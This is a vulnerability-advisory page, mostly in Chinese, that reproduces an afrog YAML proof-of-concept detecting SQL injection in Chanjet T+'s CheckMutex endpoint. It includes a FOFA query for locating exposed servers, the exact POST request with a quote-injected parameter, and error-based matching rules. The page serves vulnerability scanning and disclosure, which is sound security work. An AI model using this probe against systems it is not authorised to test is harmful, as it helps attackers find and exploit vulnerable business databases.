chanjet-tplus-checkmutex-sqli: Chanjet Tplus CheckMutex SQL Injection

日期: 2025-09-01 | 影响软件: Chanjet Tplus CheckMutex | POC: 已公开

漏洞描述

fofa: app="畅捷通-TPlus"

PoC代码[已公开]

id: chanjet-tplus-checkmutex-sqli

info:
  name: Chanjet Tplus CheckMutex SQL Injection
  author: xpoc
  severity: high
  verified: true
  description: |-
    fofa: app="畅捷通-TPlus"
  reference:
    - https://mp.weixin.qq.com/s/GS5_QfH3AmaHuCbkiomJFg
  tags: chanjet,tplus,sqli
  created: 2023/06/22

set:
  rand: randomInt(5,10)
rules:
  r0:
    request:
      method: POST
      path: /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx?method=CheckMutex
      headers:
        Content-Type: text/plain
        Cookie: ASP.NET_SessionId=; sid=admin
      body: |
        {"accNum": "{{rand}}'", "functionTag": "SYS0104", "url": ""}
    expression: (response.body.bcontains(b'附近有语法错误') && response.body.bcontains(b'order by begintime')) || (response.body.bcontains(b'Syntax error') && response.body.bcontains(b'order by begintime'))
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/chanjet-tplus-checkmutex-sqli.yaml

相关漏洞推荐